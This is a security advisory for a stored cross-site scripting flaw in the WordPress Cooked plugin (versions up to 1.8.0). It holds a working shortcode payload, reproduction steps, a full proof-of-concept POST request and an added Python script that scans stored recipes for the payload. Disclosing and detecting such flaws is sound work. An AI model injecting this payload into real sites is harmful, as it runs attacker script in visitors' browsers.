
WordPress Cooked Plugin <= 1.8.0 - Authenticated (Subscriber+) Persistent Cross-Site Scripting via Shortcode

Moderate
XjSv published GHSA-3gw3-2qjq-xqjj Aug 4, 2024

Package

No package listed

Affected versions

<= 1.8.0

Patched versions

1.8.1

Description


The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the ‘[cooked-timer]’ shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page.

Payload:

[cooked-timer minutes="8" desc="XSS<img/src=z onerror=alert(origin);//"]8 Minutes[/cooked-timer]

Steps to reproduce:

[0] Install and activate the plugin.
[1] Add a recipe at ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Enter the payload in the Recipe Template text box.
[3] Publish the recipe.
[4] The injected payload triggers on the newly created recipe page.

PoC request:

POST /wp-admin/post.php HTTP/1.1
Host: target.tld
Cookie: [subscriber_cookies]
Content-Length: 3520
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

_wpnonce=c3h1a3o3s7&user_ID=4&action=editpost&originalaction=editpost&post_author=4&post_type=cp_recipe&original_post_status=auto-draft&auto_draft=&post_ID=256&meta-box-order-nonce=c3h1a3o3s7&closedpostboxesnonce=c3h1a3o3s7&post_title=XSS+PoC&samplepermalinknonce=c3h1a3o3s7&content=&wp-preview=&original_publish=Submit+for+Review&publish=Submit+for+Review&tax_input%5Bcp_recipe_category%5D%5B%5D=0&_recipe_settings%5Bcooked_version%5D=1.8.0&_recipe_settings%5Bcontent%5D=%3Cp%3E%5Bcooked-timer+minutes%3D%228%22+desc%3D%22XSS%26lt%3Bimg%2Fsrc%3Dz+onerror%3Dalert%28origin%29%3B%2F%2F%22%5D8+Minutes%5B%2Fcooked-timer%5D%3C%2Fp%3E&_recipe_settings%5Bexcerpt%5D=&_recipe_settings%5Bseo_description%5D=&_recipe_settings%5Bdifficulty_level%5D=0&_recipe_settings%5Bprep_time%5D=&_recipe_settings%5Bcook_time%5D=&_recipe_settings%5Btotal_time%5D=&_recipe_settings%5Bingredients%5D%5B2542629%5D%5Bamount%5D=&_recipe_settings%5Bingredients%5D%5B2542629%5D%5Bmeasurement%5D=&_recipe_settings%5Bingredients%5D%5B2542629%5D%5Bname%5D=&_recipe_settings%5Bdirections%5D%5B1506110%5D%5Bimage%5D=&_recipe_settings%5Bdirections%5D%5B1506110%5D%5Bcontent%5D=&_recipe_settings%5Bnutrition%5D%5Bserving_size%5D=&_recipe_settings%5Bnutrition%5D%5Bservings%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bfat%5D=&_recipe_settings%5Bnutrition%5D%5Bsat_fat%5D=&_recipe_settings%5Bnutrition%5D%5Btrans_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bcholesterol%5D=&_recipe_settings%5Bnutrition%5D%5Bsodium%5D=&_recipe_settings%5Bnutrition%5D%5Bpotassium%5D=&_recipe_settings%5Bnutrition%5D%5Bcarbs%5D=&_recipe_settings%5Bnutrition%5D%5Bfiber%5D=&_recipe_settings%5Bnutrition%5D%5Bsugars%5D=&_recipe_settings%5Bnutrition%5D%5Bprotein%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_a%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_c%5D=&_recipe_settings%5Bnutrition%5D%5Bcalcium%5D=&_recipe_settings%5Bnutrition%5D%5Biron%5D=&_recipe_settings%5
Bnutrition%5D%5Bvitamin_d%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_e%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_k%5D=&_recipe_settings%5Bnutrition%5D%5Bthiamin%5D=&_recipe_settings%5Bnutrition%5D%5Briboflavin%5D=&_recipe_settings%5Bnutrition%5D%5Bniacin%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b6%5D=&_recipe_settings%5Bnutrition%5D%5Bfolate%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b12%5D=&_recipe_settings%5Bnutrition%5D%5Bbiotin%5D=&_recipe_settings%5Bnutrition%5D%5Bpantothenic_acid%5D=&_recipe_settings%5Bnutrition%5D%5Bphosphorus%5D=&_recipe_settings%5Bnutrition%5D%5Biodine%5D=&_recipe_settings%5Bnutrition%5D%5Bmagnesium%5D=&_recipe_settings%5Bnutrition%5D%5Bzinc%5D=&_recipe_settings%5Bnutrition%5D%5Bselenium%5D=&_recipe_settings%5Bnutrition%5D%5Bcopper%5D=&_recipe_settings%5Bnutrition%5D%5Bmanganese%5D=&_recipe_settings%5Bnutrition%5D%5Bchromium%5D=&_recipe_settings%5Bnutrition%5D%5Bmolybdenum%5D=&_recipe_settings%5Bnutrition%5D%5Bchloride%5D=&_recipe_settings%5Bgallery%5D%5Btype%5D=cooked&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D=&cooked_recipe_custom_box_nonce=c3h1a3o3s7&advanced_view=1&comment_status=open&post_name=

PoC Screencast:

https://re-alter.ru/screencast/2024-07-wordpress-cooked-plugin-v1.8.0-auth-pxss-shortcode.gif
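
An audit sketch for site owners, added here and not part of the advisory or the plugin's code: it scans stored recipe content for `[cooked-timer]` shortcodes whose attribute values contain markup once HTML entities are decoded, which covers both the raw payload above and the entity-encoded form sent in the PoC request. The function names, the heuristic pattern and the benign sample are assumptions; exporting the recipe content from the site is left to the reader.

```python
import html
import re

# Opening [cooked-timer ...] tag; group 1 is the raw attribute string.
TIMER_TAG = re.compile(r"\[cooked-timer\b([^\]]*)\]", re.IGNORECASE)
# Shortcode attribute forms: name="value", name='value', name=bare.
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""")
# Heuristic (assumption): a timer attribute is plain text, so tag delimiters,
# a decoded double quote or an inline event handler are all suspicious.
MARKUP = re.compile(r'[<>"]|\bon[a-z]+\s*=', re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Undo nested entity encoding, e.g. &amp;lt; -> &lt; -> <."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious_timers(content):
    """Return (attribute, decoded value) pairs that carry markup."""
    findings = []
    for tag in TIMER_TAG.finditer(content):
        for m in ATTR.finditer(tag.group(1)):
            raw = next(g for g in m.groups()[1:] if g is not None)
            value = decode_fully(raw)
            if MARKUP.search(value):
                findings.append((m.group(1).lower(), value))
    return findings


# Constructed samples: the advisory's payload as written, the entity-encoded
# form from the PoC request body, and a benign timer (hypothetical).
SAMPLES = {
    "raw": '[cooked-timer minutes="8" desc="XSS<img/src=z onerror=alert(origin);//"]8 Minutes[/cooked-timer]',
    "entity_encoded": '<p>[cooked-timer minutes="8" desc="XSS&lt;img/src=z onerror=alert(origin);//"]8 Minutes[/cooked-timer]</p>',
    "benign": '[cooked-timer minutes="8" desc="Simmer &amp; stir"]8 Minutes[/cooked-timer]',
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(name, find_suspicious_timers(content))
```

Any hit on a site that ran a version up to 1.8.0 is worth reviewing by hand, since the pattern is a heuristic and upgrading to 1.8.1 does not remove content that was already stored.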

Severity

Moderate


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVE ID

CVE-2024-41816
